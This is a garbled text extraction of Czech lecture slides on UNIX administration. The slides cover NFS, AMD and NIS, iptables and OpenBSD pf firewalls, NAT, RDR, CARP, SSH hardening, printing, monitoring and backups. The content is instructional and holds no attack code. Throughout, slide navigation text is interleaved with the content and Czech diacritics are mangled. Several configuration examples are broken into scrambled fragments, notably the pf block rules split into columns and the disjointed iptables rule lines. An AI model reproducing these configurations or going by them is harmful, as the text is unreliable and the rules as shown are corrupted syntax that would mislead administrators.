Sun Microsystems, Inc. Legato Networker’s nsrexecd
Shrnutí
Nastavení
Vyzkoušejte si
NFS nad UDP
Administrace UNIXu Leo Galamboš Motivace Sdílení disku
NFS pracuje s bloky velikosti 8KB
Kerberos, OpenAFS NIS/YP, NFS, AMD Samba
ty jsou dolu, ˚ rozpadnou se na Ethernetové rámce 1,5KB
Shrnutí
NFS Nastavení
server je pošle a klient pˇrijímá
AMD, YP/NIS
ˇ když nejaký fragment nepˇrišel, posílá se znovu celý NFS blok
Podrobnosti
Problém Pokud klient nestíhá brát rámce, nepˇrijde de-facto nic. Pak je potˇreba snížit velikost NFS bloku odpovídajícími parametry na “správnou” velikost, napˇríklad 1024.
Vyzkoušejte si
AMD amd mapa má na ˇrádku klíˇc a pak libovolný poˇcet zdroju˚ zdroje se zkouší v poˇradí uvedeném na ˇrádku, než se najde “živý” zdroj zaˇcínající pomlˇckou specifikuje jen default položky pro následující zdroje default pro všechno se uvádí se speciálním klíˇcem /defaults, typicky na zaˇcátku mapy ˇ cka, která platí pro vše, co klíˇcem muže ˚ být i hvezdiˇ není implicitneˇ uvedeno jinde ˇ urˇcení zdroje muže ˚ využívat promenné, napˇríklad ${key} zdroje lze vázat i s podmínkou mountovat lze nejen nfs implementováno jako NFSD s real-mountem stranou a symlinky z odpovídajících uzlu˚ koˇrene další podrobnosti info amd
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Pˇríklad težší AMD mapy
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD
/defaults type:=nfs;rhost:=obsdstronghold rfs:=/home/;sublink:=${key} NFS * secdir \ AMD, YP/NIS host!=homepc-lg;type:=nfs;\ Podrobnosti rhost:=obsdstronghold;rfs:=/disk00/mountA;\ Vyzkoušejte si sublink:=securedir secdir \ host==homepc-lg;type:=ufs;\ dev:=/dev/sd0h;sublink:=securedir Samba
Shrnutí
Nastavení
Administrace UNIXu
NIS+
Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS
ˇ implementace NIS novejší Secure RPC data encryption and authentication struktura domény není plochá, ale je to strom 6 objektu: ˚ directory entry group link table private
NIS/YP, NFS, AMD Samba Shrnutí
NFS Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Míchání lokální báze a mapy
Administrace UNIXu Leo Galamboš Motivace
v /etc/netgroup se nadefinují skupiny trojic (host,user,domain)
Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí
prázdná složka trojice znamená ANY
NFS
struktura netgroup: skupina trojice1 trojice2 . . . trojiceN 68
AMD, YP/NIS
použití v /etc/master.passwd, pˇreklad z UID na uživatelské jméno pracuje, ale naloguje se jen “skupina”: +@skupina:::::::: +::::::::/sbin/nologin
68
ˇ limit 15 trojic ve skupineˇ SunOS mel
Nastavení
Podrobnosti Vyzkoušejte si
Vyzkoušejte si
Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba
NFS server na (20:22)
Shrnutí
NFS
ostatní stroje NFS klienti pro /usr/local, pˇríp. /home NFS server master-em v NIS vytvoˇrte NFS/NIS zálohu ˇ realizujte AMD s jištením NFS svazku sjednod’te všechny mapy pomocí YP, ponechte jen lokální administrátorské úˇcty
Nastavení
AMD, YP/NIS Podrobnosti Vyzkoušejte si
Administrace UNIXu Leo Galamboš Firewall ICMP, UDP, TCP
Implementace Pravidla
ˇ Cást VI
Realita života. . . Tabulky NAT RDR Synchronizace stavu˚
Firewall, NAT, RDR, CARP
CARP Správa
Vyzkoušejte si
Program
Administrace UNIXu Leo Galamboš
29
Firewall ICMP, UDP, TCP
Firewall ICMP, UDP, TCP
Implementace Pravidla
30
Implementace Pravidla Realita života. . . Tabulky NAT RDR Synchronizace stavu˚
31
CARP Správa
32
Vyzkoušejte si
Realita života. . . Tabulky NAT RDR Synchronizace stavu˚
CARP Správa
Vyzkoušejte si
Administrace UNIXu
Úvod
Leo Galamboš Firewall ICMP, UDP, TCP
firewall (fw) filtruje packety na sít’ových adaptérech stavový firewall pravidla postihnou pouze inicializaci spoje zbytek ˇreší fw (podle stavu) – následný packet patˇrí k povolenému spoji UDP, ICMP nemají stav, ale žádost muže ˚ otevˇrít cˇ asové okno TCP spojení má stav
aplikaˇcní firewall – filtrování na úrovni aplikaˇcních protokolu˚ VoIP/SIP – voice data projdou bez nutnosti otvírat porty
Implementace Pravidla Realita života. . . Tabulky NAT RDR Synchronizace stavu˚
CARP Správa
Vyzkoušejte si
Administrace UNIXu
Úvod
Leo Galamboš Firewall ICMP, UDP, TCP
Implementace Pravidla
ˇ na smerovaˇ ci je možné pˇrepisovat IP adresy v packetech ˇ zdrojová adresa maskovaná smerovaˇ cem — NAT cílová adresa pˇrepsaná na jinou — RDR
HIPS (Host Intrusion Prevention Systems) – monitorování aplikací pf – OpenBSD; pf/ipfw – FreeBSD; iptables – Linux; FW-1 – Solaris; ipf/ipfilter
Realita života. . . Tabulky NAT RDR Synchronizace stavu˚
CARP Správa
Vyzkoušejte si
UDP
Administrace UNIXu Leo Galamboš Firewall ICMP, UDP, TCP
Implementace Pravidla Realita života. . . Tabulky NAT RDR
zdrojová a cílová IP adresa
Synchronizace stavu˚
CARP
zdrojový a cílový port délka a checksum
Správa
Vyzkoušejte si
TCP
Administrace UNIXu Leo Galamboš Firewall ICMP, UDP, TCP
Implementace
zdrojová a cílová IP adresa
Pravidla Realita života. . . Tabulky
zdrojový a cílový port délka a checksum sequence, acknowledgement number – offset 1. bytu tohoto packetu vuˇ ˚ ci náhodné hodnoteˇ zvolené pˇri inicializaci spoje (32-bit hodnoty) pˇríznaky: SYN, ACK, URG, FIN, RST, PSH velikost okna: kolik dat ješteˇ bez problému˚ pˇrijmeme
NAT RDR Synchronizace stavu˚
CARP Správa
Vyzkoušejte si
Administrace UNIXu
ICMP
Leo Galamboš Firewall
zdrojová a cílová IP adresa
ICMP, UDP, TCP
Implementace Pravidla
checksum
Realita života. . .
typ a kód ICMP zprávy
Tabulky NAT RDR
8/0 0/0 11/0 11/1 3/0 3/1 3/2 3/3
echo echo reply TTL pˇrekroˇcen chybí fragment pro rekonstrukci cílová sít’ není dostupná cílový uzel není dostupný cílový protokol není povolen cílový port není otevˇren ...
Synchronizace stavu˚
CARP Správa
Vyzkoušejte si
Linuxové implementace
Administrace UNIXu Leo Galamboš
ˇ nekolik snah o vytvoˇrení ipchains iptable
Firewall ICMP, UDP, TCP
Implementace Pravidla Realita života. . . Tabulky
nutno zakompilovat do kernelu (modulu) ˚ mocné, ale složité
NAT RDR Synchronizace stavu˚
CARP Správa
Vyzkoušejte si
ipTables plug-in moduly ovládání: iptables(8), iptables-save(8), iptables-restore(8) generátor pro normální lidi: http://firehol.sf.net/
Administrace UNIXu
ipTables
Leo Galamboš
-m state --state RELATED -j ACCEPT
Firewall ICMP, UDP, TCP
-p udp -m -j -p udp -m -j
udp --sport 53 -m state --state ESTABLISHED ACCEPT udp --dport 53 -m state --state NEW,ESTABLISHED ACCEPT
Implementace Pravidla Realita života. . . Tabulky NAT RDR
-p udp -m udp --sport 7000:7008 -m state --state ESTABLISHED -j ACCEPT -p udp -m udp --sport 7021 -m state --state ESTABLISHED -j ACCEPT -p udp -m udp --sport 88 -m state --state ESTABLISHED -j ACCEPT -p udp -m udp --sport 750 -m state --state ESTABLISHED -j ACCEPT -p icmp -m icmp --icmp-type 8 -j icmpflood -A icmpflood -m limit --limit 100/sec --limit-burst 50 -j RETURN -A icmpflood -m limit --limit 1/sec -j LOG --log-prefix "’ICMP FLOOD:’" -A icmpflood -j DROP
Synchronizace stavu˚
CARP Správa
Vyzkoušejte si
Implementace OpenBSD
Administrace UNIXu Leo Galamboš Firewall ICMP, UDP, TCP
ovládání fw modulu zajišt’uje pfctl(8) pfctl -e zapne pfctl -d vypne pfctl -s . . . ukáže vnitˇrní tabulky (all, state, nat, rules. . . ) pfctl -f . . . natáhne konfiguraci pfctl -F . . . smaže vnitˇrní tabulku (all, rules, state. . . ) iniciální konfigurace je v /etc/pf.conf (RC skript default) poznámka: seznam sít’ových adaptéru˚ ifconfig -a
Implementace Pravidla Realita života. . . Tabulky NAT RDR Synchronizace stavu˚
CARP Správa
Vyzkoušejte si
Administrace UNIXu
Pravidla
Leo Galamboš Firewall ICMP, UDP, TCP
Implementace
block block block block block block block block block block block block block block
in in in in in in in in in in in in in in
Pravidla
on le1 on le1 proto on le1 proto on le1 proto log on le1 log quick on log quick on log quick on log quick on log quick on log quick on log quick on log quick on
Realita života. . . Tabulky
tcp from any to any tcp all {tcp,udp} from any to any
NAT RDR Synchronizace stavu˚
CARP
le1 le1 le1 le1 le1 le1 le1 le1
Správa
from from from from from from from
any any any any any any any
to to to to to to to
le1 port 8080 le1 port 1:80 le1 port 1><8 le1 port 1<>6 le1:0 le1:network le1:broadcast
Vyzkoušejte si
Pravidla
Administrace UNIXu Leo Galamboš Firewall ICMP, UDP, TCP
Implementace Pravidla Realita života. . .
pass in on le1 proto tcp all flags S/SA keep state pass in log-all on le1 proto tcp all \ flags S/SA keep state pass in quick on lo pass in on le1 proto tcp from any to le1:0 \ flags S/SA keep state \ ( max-src-conn 100, \ max-src-conn-rate 50/10 ) pass in on le1 proto tcp \ from le1:network to le1 \ flags S/SA keep state
Tabulky NAT RDR Synchronizace stavu˚
CARP Správa
Vyzkoušejte si
Pravidla – praktický pˇríklad
Administrace UNIXu Leo Galamboš Firewall ICMP, UDP, TCP
ˇ Na serveru máme SOCKS bežící na uživatele _sockd (999). Tento server má právo zakládat LISTEN sockety a pracovat s nimi. Ostatní nikoliv.
Implementace Pravidla Realita života. . . Tabulky NAT RDR
scrub all fragment reassemble block drop in log all pass out on ep0 inet proto tcp all keep state pass out on ep0 inet proto udp all keep state pass out on ep0 inet proto icmp all keep state pass in on ep0 inet proto tcp from any \ to ep0 port > 1023 user = 999 keep state pass in on ep0 inet proto udp from any \ to ep0 port > 1023 user = 999 keep state
Synchronizace stavu˚
CARP Správa
Vyzkoušejte si
Administrace UNIXu Leo Galamboš Firewall
To je moc komplikované,. . . a co když si pak omylem sám zavˇru pˇrístup na firewall?
ICMP, UDP, TCP
Implementace Pravidla Realita života. . . Tabulky NAT RDR Synchronizace stavu˚
CARP Správa
Vyzkoušejte si
ˇ eˇ Nepanikaˇrte, to se bežn stává a je to normální. Procházka do servrovny je zdravá!
Administrace UNIXu Leo Galamboš
Jak se bránit vlastním chybám?
Firewall ICMP, UDP, TCP
zaved’te do cron-u mazání pravidel firewallu napište si skripty, které uloží stávající pravidla, aktivují nová a po urˇcené dobeˇ vše vrátí do výchozího stavu
Implementace Pravidla Realita života. . . Tabulky NAT RDR Synchronizace stavu˚
CARP Správa
Vyzkoušejte si
Jak debuggovat? nmap scan a identifikace cíle nessus scan a rady typu "filter out ICMP timestamp requests"
Zjednodušení správy: tabulky
Administrace UNIXu Leo Galamboš Firewall
table table table block
{ 10.0.0.0/8 } const { 10.0.0.0/8 } persist { 10.0.0.0/8 } in on le1 from to any
ICMP, UDP, TCP
Implementace Pravidla Realita života. . . Tabulky NAT RDR Synchronizace stavu˚
ˇ Tabulku lze modifikovat zvnejšku (není-li konstantní) a pokud je založena (persistentní tabulky nejsou nikdy vylouˇceny “optimalizací”): pfctl -t uchylaci -T add 172.16.0.0/12 pfctl -t uchylaci -T delete 10.0.0.0/8 pfctl -t uchylaci2 -T show Tuto techniku používá spamd(8) spamd-setup(8) pro inject IP adres.
CARP Správa
Vyzkoušejte si
Tabulky
Administrace UNIXu Leo Galamboš Firewall ICMP, UDP, TCP
naˇcítaní ze souboru table file /etc/pf.tbl
Implementace Pravidla Realita života. . . Tabulky NAT
ˇ tabulka muže ˚ být naˇcítána z nekolika souboru˚ tabulka typicky zastupuje zdrojovou nebo cílovou adresu ˇ eˇ v souboru: pfctl -f /etc/pf.conf pˇri zmen -T load table <spamd> persist file "/etc/spammers" block in on le2 proto tcp from <spamd> to port smtp
RDR Synchronizace stavu˚
CARP Správa
Vyzkoušejte si
Administrace UNIXu
NAT
Leo Galamboš Firewall ICMP, UDP, TCP
Implementace Pravidla
A
R
S
A:23042 -> S:80
R:41099 -> S:80
R:41099 -> S:80
S:80 -> A:23042
S:80 -> R:41099
S:80 -> R:41099
Realita života. . . Tabulky NAT RDR Synchronizace stavu˚
CARP Domácí rozvod 192.168.X/24
Tabulka stavů R:41099 <-> A:23042
pˇrepis zdrojové adresy a portu za jiné ˇ typické nasazení na smerovaˇ ci
Správa
Vyzkoušejte si
Pˇríklady použití
Administrace UNIXu Leo Galamboš Firewall
nat on le0 from le1:network to any -> le0
ICMP, UDP, TCP
Implementace Pravidla
######## totéž ale DHCP robust nat on le0 from le1:network to any -> (le0)
Realita života. . . Tabulky NAT RDR Synchronizace stavu˚
CARP
######## totéž ale nepˇ rehlednˇ eji nat on le0 from 192.168.2.0/24 to any -> \ 192.168.8.100
Poˇradí NAT a pravidel Nejprve se ˇreší NAT, potom se teprve aplikují pravidla firewallu. Je možné firewallovací pravidla pˇreskoˇcit speciálním NAT pravidlem typu nat pass ...
Správa
Vyzkoušejte si
Administrace UNIXu
RDR
Leo Galamboš Firewall ICMP, UDP, TCP
A
R
S
S:3055 -> A:22
S:3055 -> R:2022
S:3055 -> R:2022
A:22 -> S:3055
R:2022 -> S:3055
R:2022 -> S:3055
Implementace Pravidla Realita života. . . Tabulky NAT RDR
Domácí rozvod 192.168.X/24
Synchronizace stavu˚
Tabulka stavů S:3055 <-> R:2022 <-> A:22
CARP Správa
pˇrepis cílové adresy a portu za jiné ˇ typické nasazení na smerovaˇ ci kryjícím vnitˇrní sít’ Pozor, vniˇrní RDR: 192.168.2.22:XXXX → 195.113.20.126:80 → RDR v 192.168.2.98 → 192.168.2.25:80 → 192.168.2.22:XXXX FAIL
Vyzkoušejte si
Pˇríklady použití
Administrace UNIXu Leo Galamboš Firewall ICMP, UDP, TCP
Implementace
rdr on le0 from any to le0 port 25 -> \ 192.168.2.23 port 25
Pravidla Realita života. . . Tabulky NAT
nebo table <spamaci> persist { 10.0.0.0/8 } rdr on le0 from <spamaci> to le0 port 25 -> \ 127.0.0.1 port spamd
Poˇradí RDR a pravidel Nejprve se ˇreší RDR, potom se teprve aplikují pravidla firewallu.
RDR Synchronizace stavu˚
CARP Správa
Vyzkoušejte si
Administrace UNIXu
Synchronizace
Leo Galamboš Firewall ICMP, UDP, TCP
Implementace Pravidla Realita života. . . Tabulky NAT RDR
pfsync
Synchronizace stavu˚
CARP Správa
Vyzkoušejte si
více firewallu, ˚ resp. spare boxy “více” ⇒ multicast
Synchronizace stavu˚
Administrace UNIXu Leo Galamboš Firewall ICMP, UDP, TCP
Implementace Pravidla Realita života. . .
ifconfig pfsync0 syncdev le2 [ syncpeer ... ] ifconfig pfsync0 up
Tabulky NAT RDR Synchronizace stavu˚
CARP
syncpeer je nepovinná položka (default: multicast 224.0.0.240) automatické startovaní /etc/hostname.pfsync0 (ˇctou RC skripty): up syncdev le2 syncpeer ...
Správa
Vyzkoušejte si
Administrace UNIXu
Úvod
Leo Galamboš Firewall ICMP, UDP, TCP
Implementace Pravidla
Virtual Router Redundancy Protocol (VRRP) – RFC 2338
Realita života. . . Tabulky NAT RDR Synchronizace stavu˚
Cisco vlastní Hot Standby Router Protocol Common Address Redundancy Protocol (CARP) ˇ na právní kliˇcky firmy Cisco odpoved’ vylepšení VRRP o náznaky bezpeˇcnosti autoˇri: Ryan McBride, Michael Shalayeff, Marco Pfatschbacher, Markus Friedl
CARP Správa
Vyzkoušejte si
Administrace UNIXu
CARP
Leo Galamboš
multicast 224.0.0.18, IP protokol 112
Firewall
MAC 00:00:5e:00:01:XX, XX je cˇ íslo virtuálního CARPu
Implementace
ˇ TTL 255 ⇒ zahození pˇresmerovaných packetu˚ pˇri TTL<255 stavy: INIT, MASTER, BACKUP advbase + advskew 256 inicializace: 1 2
net.inet.carp.allow=1 net.inet.carp.log=1
start: 1 2
ifconfig carp0 create ifconfig carp0 vhid XX advskew 100 advbase 1 pass HESLO carpdev le1 192.168.100.5 255.255.255.0
ICMP, UDP, TCP
Pravidla Realita života. . . Tabulky NAT RDR Synchronizace stavu˚
CARP Správa
Vyzkoušejte si
Modifikace
Administrace UNIXu Leo Galamboš Firewall ICMP, UDP, TCP
Implementace Pravidla Realita života. . . Tabulky
Pˇrímo pˇres ifconfig(8) je možné modifikovat parametry CARPu:
NAT RDR Synchronizace stavu˚
CARP
ifconfig carp0 advskew 50 ifconfig carp0 advbase 2 status: ifconfig carp0
Správa
Vyzkoušejte si
RC-init
Administrace UNIXu Leo Galamboš Firewall ICMP, UDP, TCP
Implementace Pravidla Realita života. . . Tabulky
Do /etc/hostname.carp0
NAT RDR Synchronizace stavu˚
inet 192.168.100.5 255.255.255.0 192.168.100.255... ...vhid XX advskew 100 advbase 1... ...pass HESLO carpdev le1
ˇ sh /etc/netstart Rychlý reinit síte:
CARP Správa
Vyzkoušejte si
Vyzkoušejte si
Administrace UNIXu Leo Galamboš Firewall
(na RT) povolte spojení do SMTP (na RT) povolte DNS služby ˇ (na RT) pomocí RDR pˇresmerujte SMTP dovnitˇr na HUBy 20-24 ˇ (na RT) nastavte spamd(8) a nekterým vymezeným strojum ˚ dávejte vnitˇrní SMTP, jiným spamd z RT pass in quick on lo pass out quick on lo block in block out pass in quick on le1 proto tcp \ from any to le1 port smtp \ flags S/SA keep state
ICMP, UDP, TCP
Implementace Pravidla Realita života. . . Tabulky NAT RDR Synchronizace stavu˚
CARP Správa
Vyzkoušejte si
Vyzkoušejte si
Administrace UNIXu Leo Galamboš Firewall ICMP, UDP, TCP
ˇ založte druhý RT smerovaˇ c
Implementace Pravidla
na obou RT povolte NAT konfigurujte CARP na všech adaptérech RT ˇ smerovaˇ cu˚ ˇ nastavte pfsync mezi RT smerovaˇ ci ˇ ven spojem z HUBu 20-24 (SSH. . . ) projdete zabijte stroj, který o sobeˇ tvrdí, že je masterem CARPu pˇrežila konekce? jaké nedostatky má toto ˇrešení?
Realita života. . . Tabulky NAT RDR Synchronizace stavu˚
CARP Správa
Vyzkoušejte si
Administrace UNIXu Leo Galamboš SSH Tisk
ˇ Cást VII
ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
SSH. Tisk. Výkon, dohled, zálohování.
Program
Administrace UNIXu Leo Galamboš SSH
33
SSH
Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚
34
Tisk
Dohled nad systémy
Zálohování Vyzkoušejte si
35
ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
36
Zálohování
37
Vyzkoušejte si
Administrace UNIXu Leo Galamboš
Internet
IPSec
Štít
SSH Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚
Road warrior
Dohled nad systémy
Zálohování Vyzkoušejte si
Dohled Tisk
SMTP
Zálohování DNS
AMD
NIS/YP
NFS
Secure Shell silná autentizace a bezpeˇcná komunikace nad nebezpeˇcnými kanály forwardování Xových konekcí ˇ forwardování bežných TCP spojení/portu˚ nahrazuje puvodní ˚ BSD pˇríkazy (rsh, rlogin, rcp) v pˇrípadeˇ bezchybné implementace chrání pˇred IP spoofing – vzdálený host posílá “cizí” packety DNS spoofing – útoˇcník falšuje DNS záznamy odposlech/manipulace s datovým tokem na routerech odposlech Xové autentizace a spoofing Xového spoje
kódování SSH1 DES 3DES (IDEA) Blowfish SSH2 3DES Blowfish Arcfour CAST128 AES128/192/256 integrita SSH1 postrádá silný mechanismus SSH2 hmac-md5/sha1/ripemd160
Administrace UNIXu Leo Galamboš SSH Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
Konfigurace Per-user v adresáˇri $HOME/.ssh uživatelská konfigurace config
Administrace UNIXu Leo Galamboš SSH Tisk
rc – skript spouštený pˇred shellem (nebo povelem ˇ spoušteným via ssh(1) param) environment – nastavení prostˇredí (LIBPATH=/nfs/linux26/usr/lib) known_hosts – identifikace známých serveru˚ authorized_keys – autorizované veˇrejné klíˇce s omezeními Per-server v adresáˇri /etc/ssh uživatelská defaultní konfigurace ssh_config konfigurace serveru sshd_config ostatní soubory jsou klíˇce (RSA, DSA. . . ) – je možné ˇ je smazat, server je znovu vytvoˇrí, ale klienti by meli ˇ své klíˇce “podle plánu” být varováni, že server mení
ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
SSH autentizace
Administrace UNIXu Leo Galamboš SSH
1
jménem a heslem
Tisk
2
veˇrejným klíˇcem (s heslem i bez) SSH1 RSA SSH2 RSA DSA
ˇ rení a dohled Meˇ
3
Kerberos (SSH1)
4
R* kompatibilita identita serveru versus $HOME/.ssh/ssh_known_hosts a /etc/ssh/ssh_known_hosts StrictHostKeyChecking – není možné se na neznámé stroje pˇripojit
Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
Veˇrejný klíˇc
Administrace UNIXu Leo Galamboš SSH Tisk
ssh-keygen # (privátní) $HOME/.ssh/id_dsa, (veˇ rejný) id_dsa.pub cd .ssh scp id_dsa.pub remote@hole:.ssh/authorized_keys Password: XXX ssh -l remote hole bash-5.0$ _
Finta Je možné takto autorizovat i cizí veˇrejný klíˇc a pujˇ ˚ cit tak svoji identitu.
ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
Administrace UNIXu
SSH a rychlost
Leo Galamboš SSH Tisk
Kódování bez kódování rc4 tss des (SSH1) idea 3des (default)
start-up 100 83 98 87 95 81
prutok ˚ 100 82 77 57 44 31
3DES nahrazován blowfish-em (rychlost) komprese za cenu circa 2.12× zpomalení na CPU
ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
SSH a bezpeˇcnost
Administrace UNIXu Leo Galamboš SSH
nic není dokonalé díky nepˇresné implementaci chyby z knihoven tˇretích stran
Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚
ˇ Rešení: OpenSSH se vydalo cestou monitoru a snížení ˇ velikosti kódu bežícího pod root-em 1
první otrok ve /var/empty chrootu
2
provede pˇred-autentizaci, root operace posílá monitoru pokud monitor potvrdí správnost autentizace
3
export statických dat z otroka 1 do otroka 2 (už uživatel) statické pˇres monitor, dynamické pˇres sdílenou ˇ pamet’ export: kryptomateriál, slovníky zlib-u
Dohled nad systémy
Zálohování Vyzkoušejte si
SSH a bezpeˇcnost
Administrace UNIXu Leo Galamboš SSH
ˇ zmena portu, protokolu pˇrihlašování root-a, ev. povolení jen pˇríkazu˚
Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
maximální poˇcet neauthorizovaných pˇripojení
Zálohování
maximální prodleva pˇrihlášení
Vyzkoušejte si
autentikace heslem
/etc/ssh/sshd_config Port 1234 Protocol 2 PermitRootLogin no/forced-commands-only MaxStartups 3:50:6 LoginGraceTime 30 PasswordAuthentication no
ˇ Specifikum potemkina: Apache, WWW
Administrace UNIXu Leo Galamboš SSH Tisk
start: httpd_flags=“-u” (vypne chroot) ˇ jak pˇristoupit z nejakého solidního GUI na port 80? ssh -R 8080:localhost:80 GUI.me
mozilla localhost:8080
Potěmkin NAT
GUI.me
ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
Administrace UNIXu
Tisk
Leo Galamboš
Tiskárna je obecneˇ SSH
lokální: dˇríve cˇ asto na paralelním portu, nyní na USB
Tisk
vzdálená (sít’ová: fyzický HW se sít’ovou podporou)
ˇ rení a dohled Meˇ Dohled nad prutoky ˚
UNIX pˇredpokládá ˇ tiskáren je nekolik (organizace do tˇríd) uživateli je jedno na jaké tiskárneˇ dané tˇrídy “to vyleze” Postup UNIXových stroju˚ pˇrijme se datový tok pˇríslušející tiskárneˇ a uloží se do spool-u ze spool-u se vybírají úlohy podle nastavení priorit úloha je bud’ s RAW daty nebo se musí rozpoznat filter pro danou tiskárnu filter se spustí a jeho výstup je zaslán tiskárneˇ
Dohled nad systémy
Zálohování Vyzkoušejte si
Software
Administrace UNIXu Leo Galamboš SSH
LPD69 /LPR70
– BSD ˇrešení s konfigurací v /etc/printcap LPD/LP – SystemV ˇrešení se solidním managementem front LPRng (next generation) management front vylepšený cˇ ásteˇcneˇ na úrovenˇ LP bezpeˇcnostní vylepšení: práva pˇrístupu, software ˇ na root-a nebeží
Internet Printing Protocol (IPP) – cross-platform implementace CUPS71
69
Line Printer Daemon Line Printer Remote 71 Common UNIX Print Server 70
Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
LPD/LPR
Administrace UNIXu Leo Galamboš SSH
lpr zašle soubor na tiskovou frontu (ID je vráceno)
Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
lpq zobrazí aktuální stav fronty lprm odstraní úlohu z fronty (muže ˚ pouze vlastník nebo root) lpd démon – úlohy z fronty posílá na tiskárnu lpc dohledová utilita – zapnutí/vypnutí pˇríjmu ˇ úloh, správa fronty (mazání, zmena poˇradí), restart lpd konfigurace v /etc/printcap
Zálohování Vyzkoušejte si
Common UNIX Print Server
Administrace UNIXu Leo Galamboš SSH Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
Common UNIX Print Server
Administrace UNIXu Leo Galamboš SSH Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
Common UNIX Print Server
Administrace UNIXu Leo Galamboš SSH Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
ˇ ejší ˇ náˇradí Nejbežn
Administrace UNIXu Leo Galamboš
ˇ disk Systém, pamet’,
SSH
top(1)
Tisk
vmstat(1)
ˇ rení a dohled Meˇ
systat(1) – systat vmstat (BSD) iostat(1) dstat(1) (Linux) – ve Sleuth má jiný význam Sít’ 1
ntop(1)
2
ifstat(1)
Podpurné ˚ a jiné 1
watch(1)
2
xlogmaster(1)
3
apachetop(1)
Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
Systat
Administrace UNIXu Leo Galamboš SSH Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
dstat
Administrace UNIXu Leo Galamboš SSH Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
SNMP a Round-robin databáze démon net-snmp, konfigurace snmpconf export hodnot systému pˇres standardizovaný protokol (SNMPv1/2/3) hodnoty lze nejen cˇ íst ale i zapisovat cˇ tení slouží pro dohled a sledování a muže ˚ být PUBLIC ˇ nastavení a zápis hodnot muže ˚ zásadneˇ menit ˇ by být PUBLIC nemel pˇrístup je omezen COMMUNITY jménem nebo uživatelem a heslem72 vylistování celého stromu: snmpwalk -v1 -c commname localhost . automatické zpracování hodnot (pro archivaˇcní úˇcely) Multi Router Traffic Grapher (MRTG) – napojení na SNMP prvky RRDTool – obecné zobrazovátko Round-Robin údaju˚ 72
separátní báze od systémové
Administrace UNIXu Leo Galamboš SSH Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
Multi Router Traffic Grapher
Administrace UNIXu Leo Galamboš SSH Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
Dohled nad systémy
Administrace UNIXu Leo Galamboš SSH
Software ˇ jMon – monitor CPU a využití pameti BigBrother – nyní komerˇcní ˇ BB BigSister – reakce na zkomerˇcnení Nagios První dva produkty definují dva typy uzlu˚ sledovaˇc – kontroluje dostupnost jednotlivých služeb, sbírá hodnoty ze systému zobrazovaˇc – akceptuje hodnoty zaslané ze snímaˇcu˚ a zobrazuje sumáˇre Sledovaˇce jsou podporované i na MS-Windows.
Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
BigBrother
Administrace UNIXu Leo Galamboš SSH Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
BigSister – overall
Administrace UNIXu Leo Galamboš SSH Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
BigSister – detail
Administrace UNIXu Leo Galamboš SSH Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
Zálohování Vyzkoušejte si
Zálohování
Administrace UNIXu Leo Galamboš SSH
Ochrana proti ztráteˇ dat
Tisk ˇ rení a dohled Meˇ Dohled nad prutoky ˚ Dohled nad systémy
“pokažení” dat – historie záloh V praxi se nezálohuje vubec ˚ – obrovská chyba drží se jen poslední záloha – na pokažená data se ˇ vetšinou pˇrijde po delší dobeˇ a pak je už pozdeˇ nešifruje – praktické problémy vkládáním hesel konstantním prutokem ˚ do streameru˚ (nyní už moc nehrozí)
Zálohování Vyzkoušejte si
Zálohování na UNIXu
Administrace UNIXu Leo Galamboš
zálohy na UNIXu mají pˇríˇrazenou úrovenˇ
SSH
úrovenˇ 0: plná záloha
Tisk
úrovenˇ N: pˇrírustková ˚ záloha, záloha souboru˚ ˇ ených ˇ zmen po záloze na nižší úrovni
ˇ rení a dohled Meˇ
